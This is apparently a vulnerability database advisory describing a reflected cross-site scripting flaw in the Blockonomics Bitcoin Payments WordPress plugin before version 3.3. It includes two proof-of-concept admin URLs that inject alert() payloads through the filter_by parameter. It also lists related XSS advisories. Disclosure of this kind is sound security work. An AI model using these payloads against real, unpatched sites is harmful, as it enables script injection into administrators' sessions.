WordPress Bitcoin Payments – Blockonomics < 3.3 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin does not properly sanitise its filter action when viewing Orders before outputting it back in an attribute, leading to a reflected Cross-Site Scripting vulnerability.

Proof of Concept

v <= 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by=%22autofocus+onfocus%3Dalert%28%2FXSS%2F%29%2F%2F

v < 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by="><script>alert(/XSS/)</script>

Affects Plugins

blockonomics-bitcoin-payments

Fixed in 3.3

References

URL

https://plugins.trac.wordpress.org/changeset/2556230/blockonomics-bitcoin-payments

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

aee57190-6099-41de-a36e-89928246cc29

Timeline

Publicly Published

2021-06-01 (about 2 years ago)

Added

2021-07-01 (about 2 years ago)

Last Updated

2021-07-01 (about 2 years ago)

Other

Published

Title

Published

2020-05-14

Title

WP Product Review < 3.7.6 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2020-04-22

Title

Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS

Published

2023-06-30

Title

WPFactory Helper < 1.5.3 - Reflected Cross-Site Scripting

Published

2017-03-06

Title

WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds

Published

2022-06-13

Title

Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting